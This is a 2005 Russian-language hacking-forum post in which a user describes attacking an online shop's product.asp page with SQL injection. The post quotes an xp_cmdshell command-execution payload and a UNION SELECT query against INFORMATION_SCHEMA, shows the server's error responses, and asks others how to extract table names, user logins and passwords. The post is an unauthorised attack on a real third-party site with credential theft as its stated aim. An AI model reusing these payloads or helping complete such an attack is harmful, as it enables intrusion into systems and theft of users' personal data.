ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > АнтиАдмин
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Взлом сервера Microsoft IIS 6 Через SQL Запросы
  #1  
Старый 07.03.2005, 20:15
Аватар для [Tsh] *CorPSe*
[Tsh] *CorPSe*
Новичок
Регистрация: 06.03.2005
Сообщений: 8
Провел на форуме:
0

Репутация: 0
Отправить сообщение для [Tsh] *CorPSe* с помощью ICQ
По умолчанию Взлом сервера Microsoft IIS 6 Через SQL Запросы

Недавно Друг Сообщил Что Он Заказал MP3 С Интернет Магазина, Прошло 3 Месяца а MP3 Так и Не Пришел.

Я решил взгянуть на сайт этого магазина переход по страницам там такой:

/product.asp?f=1710

Я проверил следуйщий запрос (Проверить Тупость Админа):

/product.asp?f=1710%20%20';%20exec%20master..xp_cmd shell%20'ping%2010.10.1.2'%20--

В Ответ получил следуйщие:
-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.

/includes/header.asp, line 17
------------------------------------------------------------

У админа есть немного мозгов =))

Другим запросом узнал название базы, НО когда пытаюсь выполнить запрос с UNION выдаёт следуйшие:
(Запрос был таков: /product.asp?f=1710 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--)


-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
------------------------------------------------------------

Подскажи как получить название таблиц,логины,и пароли юзеров. Заранее Спасибо за помошь.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ